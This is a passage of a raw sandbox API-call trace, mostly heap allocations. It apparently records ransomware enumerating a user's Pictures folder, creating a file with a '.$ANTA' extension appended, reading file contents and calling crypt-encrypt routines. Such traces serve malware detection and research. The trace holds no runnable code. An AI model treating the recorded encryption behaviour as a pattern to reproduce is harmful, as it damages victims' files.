(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0087.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0087.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.929] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0087.929] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0087.929] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0087.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0087.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0087.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0087.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0087.931] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0087.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0087.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.932] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\fw_irtjvkhzb-.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0087.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0087.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0087.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.932] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0087.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0087.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0087.933] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0087.933] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0087.933] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0087.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0087.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0087.937] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0087.937] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x19ab, lpOverlapped=0x0) returned 1 [0087.938] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0087.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x19ab) returned 0x4516010 [0087.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0088.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0088.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x19ab) returned 0x45179c8 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.007] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x19ab) returned 0x4516010 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.007] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0088.007] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0088.008] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0088.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0088.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x19ab) returned 0x4516010 [0088.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0088.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0088.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0088.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x19ab) returned 0x4519380 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0088.009] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0088.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0088.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0088.009] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0088.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0088.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0088.010] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0088.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0088.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0088.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0088.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 